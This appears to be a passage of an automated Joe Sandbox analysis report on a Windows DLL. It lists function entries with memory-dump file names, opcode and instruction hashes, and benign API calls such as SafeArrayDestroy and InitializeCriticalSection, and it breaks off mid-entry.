Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID:
API String ID: 3979206172-0
Opcode ID: 68fad1291a0101cf2a574c7080bdd020d32fc5375aa0d78c0b9cf0ebbaf76d0a
Instruction ID: d9bf7fe85eeeedd67900d7ebfd15a4e8c7cbf78c3d9ecf162bebb0c305175d6d
Opcode Fuzzy Hash: 68fad1291a0101cf2a574c7080bdd020d32fc5375aa0d78c0b9cf0ebbaf76d0a
Instruction Fuzzy Hash: 55314D75A04209AFDF04DFA4C894BAEBBB8EF4D700F108659E915D7351EB35D901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D077370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6D0E11FD,000000FF,?,6D078B80,00000000,?,00000000,?,6D078C13,?,?), ref: 6D077415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6D0E11FD,000000FF,?,6D078B80,00000000,?,00000000,?,6D078C13,?,?), ref: 6D07741B
std::exception::exception.LIBCMT ref: 6D07743D
__CxxThrowException@8.LIBCMT ref: 6D077452
std::exception::exception.LIBCMT ref: 6D077461
__CxxThrowException@8.LIBCMT ref: 6D077476

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID:
API String ID: 189561132-0
Opcode ID: c2c839dd541937875ca792052c0df329953ec07a9e3f9df163b4079a9323f511
Instruction ID: cc1e41f6c5b2cab9fd475ec7ea1b66b3d5e3ddc3bd54d203f27927888d3bad25
Opcode Fuzzy Hash: c2c839dd541937875ca792052c0df329953ec07a9e3f9df163b4079a9323f511
Instruction Fuzzy Hash: 183188B2904648AFD710CF69D880AAAFBF4FF58300B55855EE94AD7B40D730E504CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D088D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: f6aa4056d8dfb6791d65a35f379c8885d0aa36734e75d29c77c11b2857e18a48
Instruction ID: 3695a7c8fe3caf1aea5134a2e5efb7b62d15d8ccd51d09b292e2473a2531a90a
Opcode Fuzzy Hash: f6aa4056d8dfb6791d65a35f379c8885d0aa36734e75d29c77c11b2857e18a48
Instruction Fuzzy Hash: AF312D70E006189FDF10CB68CC80FAEB7F9AF95200F608A9AE519E7286D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 284cd0532e4c6b8710223f5950d8e7b1bd24b5aa8434e49149b7d55601dab23f
Instruction ID: f55efea47b457fcdd7b89122fd681bcbcc1084e83219a5e521ce5bdbdf8dc7ed
Opcode Fuzzy Hash: 284cd0532e4c6b8710223f5950d8e7b1bd24b5aa8434e49149b7d55601dab23f
Instruction Fuzzy Hash: 25311A70E006199FEF10DB68CC80F6EB7F9AF85200F24899AE419E7286D771E940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9f21530322b59905fd8df9a4a6693fa63b28e17d96a707d46d1e28538a4c8f08
Instruction ID: 9a07f41816c429f00049541dbc7473e265e987d6c8569615176b8fae11fddee6
Opcode Fuzzy Hash: 9f21530322b59905fd8df9a4a6693fa63b28e17d96a707d46d1e28538a4c8f08
Instruction Fuzzy Hash: 91311970A006189FEF10CBA9CC80F6EB7FAAF85204F24899AE519E7282D771DD40CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9278fa1b88c5637163f3f675b00c720c2d831a584b15f0c9684bc32e8d945205
Instruction ID: a3e6258bc87679ddfb5c58c10ba74e24f129add054769ff9c703d978b5db98a1
Opcode Fuzzy Hash: 9278fa1b88c5637163f3f675b00c720c2d831a584b15f0c9684bc32e8d945205
Instruction Fuzzy Hash: 90311C70E006199FDF10CBA8CC80F6DB7F9AF85200F60869AE519E7286D771E940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D08884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: cf04fe6418aeb316eabd235343543611ab0cc8a9cd3a21afb999d8c1a1f04e3e
Instruction ID: 9d6a11d28f58346e0f5f51622b1dae0e3b6b07780f0863067397d0b12c1355c8
Opcode Fuzzy Hash: cf04fe6418aeb316eabd235343543611ab0cc8a9cd3a21afb999d8c1a1f04e3e
Instruction Fuzzy Hash: 95310D70E006189FEF10CB69CC80F6DB7F9AF95200F64859AE519E7282D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7bf2bc866ebfbcb6bd977498e99122fc2bccf82974d86468e9a27dd4e60ac860
Instruction ID: 1904a376bcb06548dfb110204eef5555808031915004fe22db6f910b9a6280ec
Opcode Fuzzy Hash: 7bf2bc866ebfbcb6bd977498e99122fc2bccf82974d86468e9a27dd4e60ac860
Instruction Fuzzy Hash: FD312B70E006189FDF10CBA8CC80F6EB7F9AF95200F24899AE419E7282D775D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D080561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: a43a446dfbc9886f7f36ee9c51db173e10b5d32ef472cdb2a38e259e37236f43
Instruction ID: 1052e399557fde7fb99bcab07c556da0d98f1f474600ba6bd6e9e724ea68bfb4
Opcode Fuzzy Hash: a43a446dfbc9886f7f36ee9c51db173e10b5d32ef472cdb2a38e259e37236f43
Instruction Fuzzy Hash: BD312B70E006189FEF10CBA9CD80B6DB7F9AF89300F60859AE519EB242C771D9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0801BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 284cd0532e4c6b8710223f5950d8e7b1bd24b5aa8434e49149b7d55601dab23f
Instruction ID: 5382c83bf38902715baefc881576591edab007f7982111165fb084a3e7fe0164
Opcode Fuzzy Hash: 284cd0532e4c6b8710223f5950d8e7b1bd24b5aa8434e49149b7d55601dab23f
Instruction Fuzzy Hash: 8E312B70E006189FEF20DBA9CC80B6DB7FAAF85300F64859AE519EB242C771DD818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0800B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7bf2bc866ebfbcb6bd977498e99122fc2bccf82974d86468e9a27dd4e60ac860
Instruction ID: 8647045f66fedef4c5a4cdd9d78224f5ef641bed6a073fbaa2cb26999db057b3
Opcode Fuzzy Hash: 7bf2bc866ebfbcb6bd977498e99122fc2bccf82974d86468e9a27dd4e60ac860
Instruction Fuzzy Hash: FB310970E016189FEF10DBA9CC80B6DB7F9AF89300F64859AE559EB252CB71D9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0803DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9278fa1b88c5637163f3f675b00c720c2d831a584b15f0c9684bc32e8d945205
Instruction ID: 64c41e13bfdffd2a3e0e3a12643d33c1ff726c3fdea838ac74f84cc0ae9f98df
Opcode Fuzzy Hash: 9278fa1b88c5637163f3f675b00c720c2d831a584b15f0c9684bc32e8d945205
Instruction Fuzzy Hash: FD311C70E046189FDB10CFA9CC80B6DB7F9AF85200F60869AE559E7256CB71D9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0802C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: f6aa4056d8dfb6791d65a35f379c8885d0aa36734e75d29c77c11b2857e18a48
Instruction ID: eae6e9922e2fa559f2e1e241a81e07ebdcbced80de581b1f4791e99fca5353a4
Opcode Fuzzy Hash: f6aa4056d8dfb6791d65a35f379c8885d0aa36734e75d29c77c11b2857e18a48
Instruction Fuzzy Hash: F6311A70A006189FDB10CBA9CC80BADB7F9AF89300F60869AE559EB246C771D9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: cf04fe6418aeb316eabd235343543611ab0cc8a9cd3a21afb999d8c1a1f04e3e
Instruction ID: a661dee4fcb3985a5c569273c96802c666f08ca27fcd3d8b36439d339462753c
